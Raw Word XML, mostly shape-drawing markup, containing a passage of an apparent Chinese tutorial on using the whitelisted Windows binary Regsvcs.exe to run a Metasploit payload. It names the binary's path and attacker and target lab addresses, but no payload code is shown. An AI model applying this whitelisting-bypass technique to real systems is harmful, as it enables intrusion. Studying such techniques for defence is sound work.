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8.874pt;margin-top:454.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,9097" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:9097;width:82;height:322" coordorigin="1177,9097" coordsize="82,322" path="m1217,9104l1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9105,1217,9105,1217,9105,1217,9105,1217,9105,1217,9106,1217,9106,1217,9106,1217,9107,1217,9107,1217,9107,1217,9108,1217,9108,1217,9109,1217,9109,1217,9110,1217,9111,1217,9111,1217,9112,1217,9113,1217,9113,1217,9114,1217,9115,1217,9116,1217,9117,1217,9118,1217,9119,1217,9120,1217,9121,1217,9122,1217,9123,1217,9125,1217,9126,1217,9127,1217,9129,1217,9130,1217,9132,1217,9133,1217,9135,1217,9137,1217,9138,1217,9140,1217,9142,1217,9144,1217,9146,1217,9148,1217,9150,1217,9153,1217,9155,1217,9157,1217,9160,1217,9162,1217,9165,1217,9167,1217,9170,1217,9173,1217,9176,1217,9179,1217,9182,1217,9185,1217,9188,1217,9191,1217,9195,1217,9198,1217,9202,1217,9205,1217,9209,1217,9213,1217,9217,1217,9221,1217,9225,1217,9229,1217,9233,1217,9238,1217,9242,1217,9247,1217,9252,1217,9256,1217,9261,1217,9266,1217,9271,1217,9276,1217,9282,1217,9287,1217,9293,1217,9298,1217,9304,1217,9310,1217,9316,1217,9322,1217,9328,1217,9334,1217,9341,1217,9347,1217,9354,1217,9361,1217,9367,1217,9374,1217,9382,1217,9389,1217,9396,1217,9404e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:88.874pt;margin-top:168.874pt;width:6.125pt;height:5.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1777,3377" coordsize="122,102">
        <v:shape style="position:absolute;left:1777;top:3377;width:122;height:102" coordorigin="1777,3377" coordsize="122,102" path="m1900,3446l1900,3446,1900,3446,1900,3447,1900,3448,1900,3449,1900,3449,1900,3450,1900,3451,1900,3452,1900,3452,1900,3453,1900,3454,1899,3454,1899,3455,1899,3456,1899,3456,1899,3457,1899,3458,1899,3458,1899,3459,1899,3460,1899,3460,1898,3461,1898,3461,1898,3462,1898,3463,1898,3463,1898,3464,1897,3464,1897,3465,1897,3466,1897,3466,1897,3467,1896,3467,1896,3468,1896,3468,1896,3469,1896,3469,1895,3470,1895,3470,1895,3471,1895,3471,1894,3472,1894,3472,1894,3473,1894,3473,1893,3474,1893,3474,1893,3475,1892,3475,1892,3476,1892,3476,1891,3476,1891,3477,1891,3477,1890,3478,1890,3478,1890,3479,1889,3479,1889,3479,1889,3480,1888,3480,1888,3480,1887,3481,1887,3481,1887,3481,1886,3482,1886,3482,1885,3482,1885,3483,1884,3483,1884,3483,1883,3484,1883,3484,1883,3484,1882,3485,1882,3485,1881,3485,1881,3485,1880,3486,1880,3486,1879,3486,1879,3486,1878,3487,1878,3487,1877,3487,1876,3487,1876,3488,1875,3488,1875,3488,1874,3488,1874,3488,1873,3488,1872,3489,1872,3489,1871,3489,1871,3489,1870,3489,1869,3489,1869,3489,1868,3490,1868,3490,1867,3490,1866,3490,1866,3490,1865,3490,1864,3490,1864,3490,1863,3490,1862,3490,1861,3491,1861,3491,1860,3491,1859,3491,1859,3491,1858,3491,1857,3491,1856,3491,1856,3491,1855,3491,1855,3491,1854,3491,1853,3491,1853,3491,1852,3491,1851,3491,1851,3491,1850,3491,1849,3491,1848,3491,1848,3490,1847,3490,1846,3490,1846,3490,1845,3490,1844,3490,1844,3490,1843,3490,1842,3490,1842,3490,1841,3489,1840,3489,1840,3489,1839,3489,1839,3489,1838,3489,1837,3489,1837,3488,1836,3488,1836,3488,1835,3488,1835,3488,1834,3488,1833,3487,1833,3487,1832,3487,1832,3487,1831,3486,1831,3486,1830,3486,1830,3486,1829,3485,1829,3485,1828,3485,1828,3485,1827,3484,1827,3484,1826,3484,1826,3483,1825,3483,1825,3483,1825,3482,1824,3482,1824,3482,1823,3481,1823,3481,1823,3481,1822,3480,1822,3480,1821,3480,1821,3479,1821,3479,1820,3479,1820,3478,1820,3478,1819,3477,1819,3477,1819,3476,1818,3476,1818,3476,1818,3475,1817,3475,1817,3474,1817,3474,1816,3473,1816,3473,1816,3472,1816,3472,1815,3471,1815,3471,1815,3470,1815,3470,1814,3469,1814,3469,1814,3468,1814,3468,1813,3467,1813,3467,1813,3466,1813,3466,1813,3465,1812,3464,1812,3464,1812,3463,1812,3463,1812,3462,1812,3461,1811,3461,1811,3460,1811,3460,1811,3459,1811,3458,1811,3458,1811,3457,1811,3456,1811,3456,1810,3455,1810,3454,1810,3454,1810,3453,1810,3452,1810,3452,1810,3451,1810,3450,1810,3449,1810,3449,1810,3448,1810,3447,1810,3446,1810,3446,1810,3446,1810,3445,1810,3444,1810,3443,1810,3443,1810,3442,1810,3441,1810,3441,1810,3440,1810,3439,1810,3438,1810,3438,1810,3437,1810,3436,1811,3436,1811,3435,1811,3434,1811,3434,1811,3433,1811,3433,1811,3432,1811,3431,1811,3431,1812,3430,1812,3429,1812,3429,1812,3428,1812,3428,1812,3427,1813,3426,1813,3426,1813,3425,1813,3425,1813,3424,1814,3424,1814,3423,1814,3423,1814,3422,1815,3422,1815,3421,1815,3421,1815,3420,1816,3420,1816,3419,1816,3419,1816,3418,1817,3418,1817,3417,1817,3417,1818,3416,1818,3416,1818,3415,1819,3415,1819,3415,1819,3414,1820,3414,1820,3413,1820,3413,1821,3413,1821,3412,1821,3412,1822,3411,1822,3411,1823,3411,1823,3410,1823,3410,1824,3410,1824,3409,1825,3409,1825,3409,1825,3408,1826,3408,1826,3408,1827,3407,1827,3407,1828,3407,1828,3407,1829,3406,1829,3406,1830,3406,1830,3406,1831,3405,1831,3405,1832,3405,1832,3405,1833,3404,1833,3404,1834,3404,1835,3404,1835,3404,1836,3403,1836,3403,1837,3403,1837,3403,1838,3403,1839,3403,1839,3402,1840,3402,1840,3402,1841,3402,1842,3402,1842,3402,1843,3402,1844,3402,1844,3401,1845,3401,1846,3401,1846,3401,1847,3401,1848,3401,1848,3401,1849,3401,1850,3401,1851,3401,1851,3401,1852,3401,1853,3401,1853,3401,1854,3401,1855,3401,1855,3401,1856,3401,1856,3401,1857,3401,1858,3401,1859,3401,1859,3401,1860,3401,1861,3401,1861,3401,1862,3401,1863,3401,1864,3401,1864,3401,1865,3401,1866,3401,1866,3402,1867,3402,1868,3402,1868,3402,1869,3402,1869,3402,1870,3402,1871,3402,1871,3403,1872,3403,1872,3403,1873,3403,1874,3403,1874,3403,1875,3404,1875,3404,1876,3404,1876,3404,1877,3404,1878,3405,1878,3405,1879,3405,1879,3405,1880,3406,1880,3406,1881,3406,1881,3406,1882,3407,1882,3407,1883,3407,1883,3407,1883,3408,1884,3408,1884,3408,1885,3409,1885,3409,1886,3409,1886,3410,1887,3410,1887,3410,1887,3411,1888,3411,1888,3411,1889,3412,1889,3412,1889,3413,1890,3413,1890,3413,1890,3414,1891,3414,1891,3415,1891,3415,1892,3415,1892,3416,1892,3416,1893,3417,1893,3417,1893,3418,1894,3418,1894,3419,1894,3419,1894,3420,1895,3420,1895,3421,1895,3421,1895,3422,1896,3422,1896,3423,1896,3423,1896,3424,1896,3424,1897,3425,1897,3425,1897,3426,1897,3426,1897,3427,1898,3428,1898,3428,1898,3429,1898,3429,1898,3430,1898,3431,1899,3431,1899,3432,1899,3433,1899,3433,1899,3434,1899,3434,1899,3435,1899,3436,1899,3436,1899,3437,1900,3438,1900,3438,1900,3439,1900,3440,1900,3441,1900,3441,1900,3442,1900,3443,1900,3443,1900,3444,1900,3445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,1900,3446e x" fillcolor="#000000" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:88.874pt;margin-top:189.874pt;width:6.125pt;height:5.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1777,3797" coordsize="122,102">
        <v:shape style="position:absolute;left:1777;top:3797;width:122;height:102" coordorigin="1777,3797" coordsize="122,102" path="m1900,3866l1900,3866,1900,3867,1900,3867,1900,3868,1900,3869,1900,3870,1900,3870,1900,3871,1900,3872,1900,3872,1900,3873,1900,3874,1899,3875,1899,3875,1899,3876,1899,3877,1899,3877,1899,3878,1899,3879,1899,3879,1899,3880,1899,3880,1898,3881,1898,3882,1898,3882,1898,3883,1898,3883,1898,3884,1897,3885,1897,3885,1897,3886,1897,3886,1897,3887,1896,3887,1896,3888,1896,3889,1896,3889,1896,3890,1895,3890,1895,3891,1895,3891,1895,3892,1894,3892,1894,3893,1894,3893,1894,3894,1893,3894,1893,3894,1893,3895,1892,3895,1892,3896,1892,3896,1891,3897,1891,3897,1891,3898,1890,3898,1890,3898,1890,3899,1889,3899,1889,3900,1889,3900,1888,3900,1888,3901,1887,3901,1887,3901,1887,3902,1886,3902,1886,3902,1885,3903,1885,3903,1884,3903,1884,3904,1883,3904,1883,3904,1883,3905,1882,3905,1882,3905,1881,3905,1881,3906,1880,3906,1880,3906,1879,3906,1879,3907,1878,3907,1878,3907,1877,3907,1876,3908,1876,3908,1875,3908,1875,3908,1874,3908,1874,3908,1873,3909,1872,3909,1872,3909,1871,3909,1871,3909,1870,3909,1869,3910,1869,3910,1868,3910,1868,3910,1867,3910,1866,3910,1866,3910,1865,3910,1864,3910,1864,3911,1863,3911,1862,3911,1861,3911,1861,3911,1860,3911,1859,3911,1859,3911,1858,3911,1857,3911,1856,3911,1856,3911,1855,3911,1855,3911,1854,3911,1853,3911,1853,3911,1852,3911,1851,3911,1851,3911,1850,3911,1849,3911,1848,3911,1848,3911,1847,3911,1846,3911,1846,3910,1845,3910,1844,3910,1844,3910,1843,3910,1842,3910,1842,3910,1841,3910,1840,3910,1840,3909,1839,3909,1839,3909,1838,3909,1837,3909,1837,3909,1836,3908,1836,3908,1835,3908,1835,3908,1834,3908,1833,3908,1833,3907,1832,3907,1832,3907,1831,3907,1831,3906,1830,3906,1830,3906,1829,3906,1829,3905,1828,3905,1828,3905,1827,3905,1827,3904,1826,3904,1826,3904,1825,3903,1825,3903,1825,3903,1824,3902,1824,3902,1823,3902,1823,3901,1823,3901,1822,3901,1822,3900,1821,3900,1821,3900,1821,3899,1820,3899,1820,3898,1820,3898,1819,3898,1819,3897,1819,3897,1818,3896,1818,3896,1818,3895,1817,3895,1817,3894,1817,3894,1816,3894,1816,3893,1816,3893,1816,3892,1815,3892,1815,3891,1815,3891,1815,3890,1814,3890,1814,3889,1814,3889,1814,3888,1813,3887,1813,3887,1813,3886,1813,3886,1813,3885,1812,3885,1812,3884,1812,3883,1812,3883,1812,3882,1812,3882,1811,3881,1811,3880,1811,3880,1811,3879,1811,3879,1811,3878,1811,3877,1811,3877,1811,3876,1810,3875,1810,3875,1810,3874,1810,3873,1810,3872,1810,3872,1810,3871,1810,3870,1810,3870,1810,3869,1810,3868,1810,3867,1810,3867,1810,3866,1810,3866,1810,3865,1810,3864,1810,3864,1810,3863,1810,3862,1810,3862,1810,3861,1810,3860,1810,3859,1810,3859,1810,3858,1810,3857,1810,3857,1811,3856,1811,3855,1811,3855,1811,3854,1811,3853,1811,3853,1811,3852,1811,3851,1811,3851,1812,3850,1812,3850,1812,3849,1812,3848,1812,3848,1812,3847,1813,3847,1813,3846,1813,3846,1813,3845,1813,3844,1814,3844,1814,3843,1814,3843,1814,3842,1815,3842,1815,3841,1815,3841,1815,3840,1816,3840,1816,3839,1816,3839,1816,3838,1817,3838,1817,3837,1817,3837,1818,3837,1818,3836,1818,3836,1819,3835,1819,3835,1819,3834,1820,3834,1820,3834,1820,3833,1821,3833,1821,3832,1821,3832,1822,3832,1822,3831,1823,3831,1823,3831,1823,3830,1824,3830,1824,3830,1825,3829,1825,3829,1825,3829,1826,3828,1826,3828,1827,3828,1827,3827,1828,3827,1828,3827,1829,3827,1829,3826,1830,3826,1830,3826,1831,3826,1831,3825,1832,3825,1832,3825,1833,3825,1833,3824,1834,3824,1835,3824,1835,3824,1836,3824,1836,3823,1837,3823,1837,3823,1838,3823,1839,3823,1839,3823,1840,3822,1840,3822,1841,3822,1842,3822,1842,3822,1843,3822,1844,3822,1844,3822,1845,3822,1846,3821,1846,3821,1847,3821,1848,3821,1848,3821,1849,3821,1850,3821,1851,3821,1851,3821,1852,3821,1853,3821,1853,3821,1854,3821,1855,3821,1855,3821,1856,3821,1856,3821,1857,3821,1858,3821,1859,3821,1859,3821,1860,3821,1861,3821,1861,3821,1862,3821,1863,3821,1864,3821,1864,3821,1865,3822,1866,3822,1866,3822,1867,3822,1868,3822,1868,3822,1869,3822,1869,3822,1870,3822,1871,3823,1871,3823,1872,3823,1872,3823,1873,3823,1874,3823,1874,3824,1875,3824,1875,3824,1876,3824,1876,3824,1877,3825,1878,3825,1878,3825,1879,3825,1879,3826,1880,3826,1880,3826,1881,3826,1881,3827,1882,3827,1882,3827,1883,3827,1883,3828,1883,3828,1884,3828,1884,3829,1885,3829,1885,3829,1886,3830,1886,3830,1887,3830,1887,3831,1887,3831,1888,3831,1888,3832,1889,3832,1889,3832,1889,3833,1890,3833,1890,3834,1890,3834,1891,3834,1891,3835,1891,3835,1892,3836,1892,3836,1892,3837,1893,3837,1893,3837,1893,3838,1894,3838,1894,3839,1894,3839,1894,3840,1895,3840,1895,3841,1895,3841,1895,3842,1896,3842,1896,3843,1896,3843,1896,3844,1896,3844,1897,3845,1897,3846,1897,3846,1897,3847,1897,3847,1898,3848,1898,3848,1898,3849,1898,3850,1898,3850,1898,3851,1899,3851,1899,3852,1899,3853,1899,3853,1899,3854,1899,3855,1899,3855,1899,3856,1899,3857,1899,3857,1900,3858,1900,3859,1900,3859,1900,3860,1900,3861,1900,3862,1900,3862,1900,3863,1900,3864,1900,3864,1900,3865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,1900,3866e x" fillcolor="#000000" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:88.874pt;margin-top:210.874pt;width:6.125pt;height:5.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1777,4217" coordsize="122,102">
        <v:shape style="position:absolute;left:1777;top:4217;width:122;height:102" coordorigin="1777,4217" coordsize="122,102" path="m1900,4286l1900,4286,1900,4287,1900,4288,1900,4288,1900,4289,1900,4290,1900,4291,1900,4291,1900,4292,1900,4293,1900,4293,1900,4294,1899,4295,1899,4295,1899,4296,1899,4297,1899,4297,1899,4298,1899,4299,1899,4299,1899,4300,1899,4301,1898,4301,1898,4302,1898,4302,1898,4303,1898,4304,1898,4304,1897,4305,1897,4305,1897,4306,1897,4307,1897,4307,1896,4308,1896,4308,1896,4309,1896,4309,1896,4310,1895,4310,1895,4311,1895,4311,1895,4312,1894,4312,1894,4313,1894,4313,1894,4314,1893,4314,1893,4315,1893,4315,1892,4316,1892,4316,1892,4316,1891,4317,1891,4317,1891,4318,1890,4318,1890,4319,1890,4319,1889,4319,1889,4320,1889,4320,1888,4320,1888,4321,1887,4321,1887,4322,1887,4322,1886,4322,1886,4323,1885,4323,1885,4323,1884,4324,1884,4324,1883,4324,1883,4324,1883,4325,1882,4325,1882,4325,1881,4326,1881,4326,1880,4326,1880,4326,1879,4327,1879,4327,1878,4327,1878,4327,1877,4328,1876,4328,1876,4328,1875,4328,1875,4328,1874,4329,1874,4329,1873,4329,1872,4329,1872,4329,1871,4329,1871,4329,1870,4330,1869,4330,1869,4330,1868,4330,1868,4330,1867,4330,1866,4330,1866,4330,1865,4331,1864,4331,1864,4331,1863,4331,1862,4331,1861,4331,1861,4331,1860,4331,1859,4331,1859,4331,1858,4331,1857,4331,1856,4331,1856,4331,1855,4331,1855,4331,1854,4331,1853,4331,1853,4331,1852,4331,1851,4331,1851,4331,1850,4331,1849,4331,1848,4331,1848,4331,1847,4331,1846,4331,1846,4331,1845,4331,1844,4330,1844,4330,1843,4330,1842,4330,1842,4330,1841,4330,1840,4330,1840,4330,1839,4329,1839,4329,1838,4329,1837,4329,1837,4329,1836,4329,1836,4329,1835,4328,1835,4328,1834,4328,1833,4328,1833,4328,1832,4327,1832,4327,1831,4327,1831,4327,1830,4326,1830,4326,1829,4326,1829,4326,1828,4325,1828,4325,1827,4325,1827,4324,1826,4324,1826,4324,1825,4324,1825,4323,1825,4323,1824,4323,1824,4322,1823,4322,1823,4322,1823,4321,1822,4321,1822,4320,1821,4320,1821,4320,1821,4319,1820,4319,1820,4319,1820,4318,1819,4318,1819,4317,1819,4317,1818,4316,1818,4316,1818,4316,1817,4315,1817,4315,1817,4314,1816,4314,1816,4313,1816,4313,1816,4312,1815,4312,1815,4311,1815,4311,1815,4310,1814,4310,1814,4309,1814,4309,1814,4308,1813,4308,1813,4307,1813,4307,1813,4306,1813,4305,1812,4305,1812,4304,1812,4304,1812,4303,1812,4302,1812,4302,1811,4301,1811,4301,1811,4300,1811,4299,1811,4299,1811,4298,1811,4297,1811,4297,1811,4296,1810,4295,1810,4295,1810,4294,1810,4293,1810,4293,1810,4292,1810,4291,1810,4291,1810,4290,1810,4289,1810,4288,1810,4288,1810,4287,1810,4286,1810,4286,1810,4285,1810,4285,1810,4284,1810,4283,1810,4282,1810,4282,1810,4281,1810,4280,1810,4280,1810,4279,1810,4278,1810,4278,1810,4277,1811,4276,1811,4276,1811,4275,1811,4274,1811,4274,1811,4273,1811,4272,1811,4272,1811,4271,1812,4270,1812,4270,1812,4269,1812,4269,1812,4268,1812,4267,1813,4267,1813,4266,1813,4266,1813,4265,1813,4265,1814,4264,1814,4264,1814,4263,1814,4263,1815,4262,1815,4261,1815,4261,1815,4260,1816,4260,1816,4259,1816,4259,1816,4259,1817,4258,1817,4258,1817,4257,1818,4257,1818,4256,1818,4256,1819,4255,1819,4255,1819,4255,1820,4254,1820,4254,1820,4253,1821,4253,1821,4253,1821,4252,1822,4252,1822,4251,1823,4251,1823,4251,1823,4250,1824,4250,1824,4250,1825,4249,1825,4249,1825,4249,1826,4248,1826,4248,1827,4248,1827,4248,1828,4247,1828,4247,1829,4247,1829,4246,1830,4246,1830,4246,1831,4246,1831,4245,1832,4245,1832,4245,1833,4245,1833,4245,1834,4244,1835,4244,1835,4244,1836,4244,1836,4244,1837,4243,1837,4243,1838,4243,1839,4243,1839,4243,1840,4243,1840,4243,1841,4242,1842,4242,1842,4242,1843,4242,1844,4242,1844,4242,1845,4242,1846,4242,1846,4242,1847,4242,1848,4241,1848,4241,1849,4241,1850,4241,1851,4241,1851,4241,1852,4241,1853,4241,1853,4241,1854,4241,1855,4241,1855,4241,1856,4241,1856,4241,1857,4241,1858,4241,1859,4241,1859,4241,1860,4241,1861,4241,1861,4241,1862,4241,1863,4242,1864,4242,1864,4242,1865,4242,1866,4242,1866,4242,1867,4242,1868,4242,1868,4242,1869,4242,1869,4243,1870,4243,1871,4243,1871,4243,1872,4243,1872,4243,1873,4243,1874,4244,1874,4244,1875,4244,1875,4244,1876,4244,1876,4245,1877,4245,1878,4245,1878,4245,1879,4245,1879,4246,1880,4246,1880,4246,1881,4246,1881,4247,1882,4247,1882,4247,1883,4248,1883,4248,1883,4248,1884,4248,1884,4249,1885,4249,1885,4249,1886,4250,1886,4250,1887,4250,1887,4251,1887,4251,1888,4251,1888,4252,1889,4252,1889,4253,1889,4253,1890,4253,1890,4254,1890,4254,1891,4255,1891,4255,1891,4255,1892,4256,1892,4256,1892,4257,1893,4257,1893,4258,1893,4258,1894,4259,1894,4259,1894,4259,1894,4260,1895,4260,1895,4261,1895,4261,1895,4262,1896,4263,1896,4263,1896,4264,1896,4264,1896,4265,1897,4265,1897,4266,1897,4266,1897,4267,1897,4267,1898,4268,1898,4269,1898,4269,1898,4270,1898,4270,1898,4271,1899,4272,1899,4272,1899,4273,1899,4274,1899,4274,1899,4275,1899,4276,1899,4276,1899,4277,1899,4278,1900,4278,1900,4279,1900,4280,1900,4280,1900,4281,1900,4282,1900,4282,1900,4283,1900,4284,1900,4285,1900,4285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,1900,4286e x" fillcolor="#000000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3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>egsvcs简介：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Regsvcs为.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NET服务安装工具，主要提供三类服务：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加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>载并注册程序集。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2307" w:right="2752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生成、注册类型库并将其安装到指定的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="3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COM+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1.0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应用程序中。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配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>以编程方式添加到类的服务。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23" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>说明：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Regs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vcs.exe所在路径没有被系统添加PATH环境变量中，因此，Regsvcs命令无法识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别。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961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具体参考微</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>软官方文档：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https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>et-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3783"/>
          <w:spacing w:val="-14"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>serv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>ices-installation-tool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基于白名单Regsvcs.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exe配置payload：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7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默认位置：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="75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pacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C:\Windows\Mi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>crosoft.NET\Framework\v4.0.30319\regsvcs.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="27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攻击机：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192.168.1.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="57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Debian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646" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="7131" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="12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6"/>
        </w:rPr>
        <w:t> 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192.168.1.3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7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配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置攻击机msf：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74.500pt;margin-top:398.500pt;width:449.500pt;height:34.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,7970" coordsize="8990,690">
        <v:shape style="position:absolute;left:1490;top:7970;width:8990;height:690" coordorigin="1490,7970" coordsize="8990,690" path="m1510,7993l1510,7993,1510,7993,1510,7993,1510,7993,1510,7993,1510,7993,1511,7993,1512,7993,1512,7993,1514,7993,1515,7993,1517,7993,1519,7993,1521,7993,1524,7993,1528,7993,1532,7993,1536,7993,1541,7993,1546,7993,1552,7993,1559,7993,1566,7993,1575,7993,1583,7993,1593,7993,1603,7993,1615,7993,1627,7993,1640,7993,1654,7993,1668,7993,1684,7993,1701,7993,1719,7993,1738,7993,1758,7993,1780,7993,1802,7993,1826,7993,1851,7993,1877,7993,1904,7993,1933,7993,1963,7993,1995,7993,2028,7993,2063,7993,2099,7993,2136,7993,2175,7993,2216,7993,2259,7993,2303,7993,2348,7993,2396,7993,2445,7993,2496,7993,2549,7993,2604,7993,2660,7993,2719,7993,2779,7993,2841,7993,2906,7993,2972,7993,3041,7993,3112,7993,3184,7993,3259,7993,3336,7993,3416,7993,3498,7993,3582,7993,3668,7993,3757,7993,3848,7993,3941,7993,4037,7993,4136,7993,4236,7993,4340,7993,4446,7993,4555,7993,4666,7993,4780,7993,4897,7993,5017,7993,5139,7993,5264,7993,5392,7993,5523,7993,5657,7993,5793,7993,5933,7993,6076,7993,6222,7993,6370,7993,6522,7993,6677,7993,6835,7993,6997,7993,7161,7993,7329,7993,7500,7993,7675,7993,7853,7993,8034,7993,8219,7993,8407,7993,8598,7993,8793,7993,8992,7993,9194,7993,9400,7993,9609,7993,9823,7993,10039,7993,10260,7993,10484,7993,10484,7993,10484,7993,10484,7993,10484,7993,10484,7993,10484,7993,10484,7993,10484,7993,10484,7993,10484,7993,10484,7993,10484,7994,10484,7994,10484,7994,10484,7994,10484,7994,10484,7995,10484,7995,10484,7995,10484,7996,10484,7996,10484,7997,10484,7997,10484,7998,10484,7999,10484,7999,10484,8000,10484,8001,10484,8002,10484,8003,10484,8004,10484,8005,10484,8006,10484,8007,10484,8009,10484,8010,10484,8012,10484,8013,10484,8015,10484,8017,10484,8019,10484,8021,10484,8023,10484,8025,10484,8027,10484,8030,10484,8032,10484,8035,10484,8037,10484,8040,10484,8043,10484,8046,10484,8049,10484,8053,10484,8056,10484,8060,10484,8063,10484,8067,10484,8071,10484,8075,10484,8080,10484,8084,10484,8089,10484,8093,10484,8098,10484,8103,10484,8108,10484,8114,10484,8119,10484,8125,10484,8130,10484,8136,10484,8143,10484,8149,10484,8155,10484,8162,10484,8169,10484,8176,10484,8183,10484,8191,10484,8198,10484,8206,10484,8214,10484,8222,10484,8231,10484,8239,10484,8248,10484,8257,10484,8266,10484,8276,10484,8285,10484,8295,10484,8305,10484,8315,10484,8326,10484,8337,10484,8348,10484,8359,10484,8370,10484,8382,10484,8394,10484,8406,10484,8418,10484,8431,10484,8444,10484,8457,10484,8470,10484,8484,10484,8498,10484,8512,10484,8526,10484,8541,10484,8556,10484,8571,10484,8587,10484,8603,10484,8619,10484,8635,10484,8651,10484,8668,10484,8668,10484,8668,10484,8668,10484,8668,10484,8668,10484,8668,10483,8668,10482,8668,10482,8668,10480,8668,10479,8668,10477,8668,10475,8668,10473,8668,10470,8668,10466,8668,10462,8668,10458,8668,10453,8668,10448,8668,10442,8668,10435,8668,10428,8668,10419,8668,10411,8668,10401,8668,10391,8668,10379,8668,10367,8668,10354,8668,10340,8668,10326,8668,10310,8668,10293,8668,10275,8668,10256,8668,10236,8668,10215,8668,10192,8668,10168,8668,10143,8668,10117,8668,10090,8668,10061,8668,10031,8668,9999,8668,9966,8668,9931,8668,9895,8668,9858,8668,9819,8668,9778,8668,9735,8668,9691,8668,9646,8668,9598,8668,9549,8668,9498,8668,9445,8668,9391,8668,9334,8668,9275,8668,9215,8668,9153,8668,9088,8668,9022,8668,8953,8668,8883,8668,8810,8668,8735,8668,8658,8668,8578,8668,8497,8668,8413,8668,8326,8668,8238,8668,8146,8668,8053,8668,7957,8668,7859,8668,7758,8668,7654,8668,7548,8668,7439,8668,7328,8668,7214,8668,7097,8668,6977,8668,6855,8668,6730,8668,6602,8668,6471,8668,6337,8668,6201,8668,6061,8668,5918,8668,5773,8668,5624,8668,5472,8668,5317,8668,5159,8668,4997,8668,4833,8668,4665,8668,4494,8668,4319,8668,4141,8668,3960,8668,3776,8668,3587,8668,3396,8668,3201,8668,3002,8668,2800,8668,2594,8668,2385,8668,2172,8668,1955,8668,1734,8668,15